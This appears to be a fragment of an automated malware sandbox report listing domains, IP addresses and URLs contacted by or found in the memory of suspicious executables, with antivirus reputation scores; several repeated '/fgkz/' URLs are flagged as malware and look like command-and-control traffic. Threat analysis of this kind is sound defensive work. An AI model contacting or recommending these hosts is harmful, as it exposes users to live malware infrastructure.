                    https://www.cloudflare.com/login?utm_source=error_100x0%VirustotalBrowse
                    https://s3-us-west-2.amazonaws.com/listingzen/agents/agent4/450/agent1482359813.jpg0%VirustotalBrowse
                    http://www.theranchobizarro.com/img/site/dark_logo_250.jpg0%Avira URL Cloudsafe
                    https://performance.radar.cloudflare.com/beacon.js0%VirustotalBrowse
                    https://www.hover.com/email?source=parked0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/pricing0%Avira URL Cloudsafe
                    https://www.hover.com/about?source=parked0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.js0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/img/site/dark_logo_250.jpg0%VirustotalBrowse
                    http://www.slimdut.top/fgkz/1%VirustotalBrowse
                    https://www.hover.com/email?source=parked0%VirustotalBrowse
                    http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6J0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/assets/materialize/dist/js/materialize.min.js0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/assets/pusher-js/dist/web/pusher.js0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/pricing0%VirustotalBrowse
                    https://www.hover.com/about?source=parked0%VirustotalBrowse
                    https://www.hover.com/domains/results0%Avira URL Cloudsafe
                    http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj100%Avira URL Cloudmalware
                    http://www.theranchobizarro.com/marketplace0%Avira URL Cloudsafe
                    https://sparrow.cloudflare.com/api/v1/event0%VirustotalBrowse
                    http://www.uty803.com/fgkz/0%Avira URL Cloudsafe
                    http://www.noobblaster.com/fgkz/0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/img/site/light_icon.png0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/favicon.ico0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/contact0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com0%Avira URL Cloudsafe
                    https://www.hover.com/tools?source=parked0%Avira URL Cloudsafe
                    https://help.hover.com/home?source=parked0%Avira URL Cloudsafe
                    http://www.noobblaster.com/fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj0%Avira URL Cloudsafe
                    http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
                    https://www.hover.com/domain_pricing?source=parked0%Avira URL Cloudsafe
                    https://www.hover.com/privacy?source=parked0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/js/compiled/unlogged/unlogged.js0%Avira URL Cloudsafe
                    https://uk.pinterest.com/listingzen0%Avira URL Cloudsafe
                    https://twitter.com/hover0%Avira URL Cloudsafe
                    http://www.sportspaj.com/fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ==0%Avira URL Cloudsafe
                    http://www.otomain.info/fgkz/0%Avira URL Cloudsafe
                    https://www.hover.com/transfer_in?source=parked0%Avira URL Cloudsafe
                    https://www.hover.com/renew?source=parked0%Avira URL Cloudsafe
                    http://www.nexgen-gaming.com/fgkz/100%Avira URL Cloudmalware
                    http://www.hugelmann.org/fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj0%Avira URL Cloudsafe
                    http://www.hugelmann.org/fgkz/0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/login0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/privacy0%Avira URL Cloudsafe
                    http://www.sciencebot.sbs/fgkz/100%Avira URL Cloudmalware
                    http://www.theranchobizarro.com/build/css/compiled/backend/backend-f2bf381915.css0%Avira URL Cloudsafe
                    http://www.sportspaj.com/fgkz/0%Avira URL Cloudsafe
                    https://www.listingzen.com/0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj100%Avira URL Cloudmalware
                    http://www.theranchobizarro.com/faq0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/register0%Avira URL Cloudsafe
                    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
                    http://www.gpcamservices.com/fgkz/0%Avira URL Cloudsafe
                    http://www.nathanladd.software/fgkz/0%Avira URL Cloudsafe
                    http://www.uty803.com/fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/profile0%Avira URL Cloudsafe
                    http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==100%Avira URL Cloudmalware
                    https://www.hover.com/tos?source=parked0%Avira URL Cloudsafe
                    https://www.cloudflare.com/5xx-error-landing/0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/assets/jquery/dist/jquery.min.js0%Avira URL Cloudsafe
                    http://www.ListingZen.com0%Avira URL Cloudsafe
                    https://s3-us-west-2.amazonaws.com/listingzen/vendors/vendor2/450/vendor1472074370.jpg0%Avira URL Cloudsafe
                    http://www.noobblaster.com0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/sitemap.xml0%Avira URL Cloudsafe
                    https://www.hover.com/?source=parked0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    2xin1.zhanghonghong.com
                    		122.10.12.59
                    		truetrue
                      		unknown
                      gpcamservices.com
                      		119.18.54.85
                      		truetrueunknown
                      www.otomain.info
                      		104.21.92.135
                      		truetrueunknown
                      www.sportspaj.com
                      		212.32.237.90
                      		truetrueunknown
                      www.theranchobizarro.com
                      		52.9.242.57
                      		truetrueunknown
                      www.slimdut.top
                      		66.29.154.248
                      		truetrue
                        		unknown
                        parkingpage.namecheap.com
                        		91.195.240.19
                        		truetrueunknown
                        nexgen-gaming.com
                        		167.172.228.26
                        		truetrueunknown
                        noobblaster.com
                        		167.172.228.26
                        		truetrueunknown
                        www.hugelmann.org
                        		216.40.34.41
                        		truetrue
                          		unknown
                          www.mlfloor.net
                          		unknown
                          		unknowntrueunknown
                          www.7789552398763.net
                          		unknown
                          		unknowntrueunknown
                          www.heilao9.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.defengnm.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.gpcamservices.com
                              		unknown
                              		unknowntrueunknown
                              www.nathanladd.software
                              		unknown
                              		unknowntrueunknown
                              www.nexgen-gaming.com
                              		unknown
                              		unknowntrueunknown
                              www.uty803.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.pheonix-travels.com
                                		unknown
                                		unknowntrueunknown
                                www.noobblaster.com
                                		unknown
                                		unknowntrueunknown
                                www.sciencebot.sbs
                                		unknown
                                		unknowntrueunknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.theranchobizarro.com/fgkz/true
                                • 5%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.pheonix-travels.com/fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.slimdut.top/fgkz/true
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.slimdut.top/fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.uty803.com/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.noobblaster.com/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.noobblaster.com/fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sportspaj.com/fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.otomain.info/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nexgen-gaming.com/fgkz/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.hugelmann.org/fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hugelmann.org/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sciencebot.sbs/fgkz/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.sportspaj.com/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.gpcamservices.com/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nathanladd.software/fgkz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.uty803.com/fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTjtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==true
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.theranchobizarro.com/termsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabprint.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://s3-us-west-2.amazonaws.com/listingzen/agents/agent4/450/agent1482359813.jpgprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.instagram.com/hover_domainsprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/img/site/dark_logo.pngprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/pricing#pricingprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/img/site/light_logo.pngprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://performance.radar.cloudflare.com/beacon.jsprint.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.cloudflare.com/login?utm_source=error_100xprint.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://sparrow.cloudflare.com/api/v1/eventprint.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ww1.nexgen-gaming.comprint.exe, 00000010.00000002.4497033740.000000000384A000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.000000000343A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/img/site/dark_logo_250.jpgprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/email?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/pricingprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/about?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6Jprint.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004712000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/assets/materialize/dist/js/materialize.min.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/assets/pusher-js/dist/web/pusher.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schema.orgprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.hover.com/domains/resultsprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/marketplaceprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/img/site/light_icon.pngprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchprint.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.theranchobizarro.com/favicon.icoNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/contactNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.comNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUnmxRI.exe, 00000000.00000002.2086201250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, tehuvFgZlLZK.exe, 0000000A.00000002.2169047373.00000000026E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.hover.com/tools?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://help.hover.com/home?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://cdn.jsinit.directfwd.com/sk-jspark_init.phpprint.exe, 00000010.00000002.4497033740.0000000003E92000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003A82000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/domain_pricing?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/privacy?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/js/compiled/unlogged/unlogged.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://uk.pinterest.com/listingzenprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://twitter.com/hoverprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mozilla.org0/print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://crash-reports.mozilla.com/submit?id=print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.hover.com/transfer_in?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/renew?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/loginNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/privacyprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.theranchobizarro.com/build/css/compiled/backend/backend-f2bf381915.cssprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.listingzen.com/print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.ecosia.org/newtab/print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.theranchobizarro.com/faqprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/registerNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.cloudflare.com/5xx-error-landingprint.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.theranchobizarro.com/profileprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/tos?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
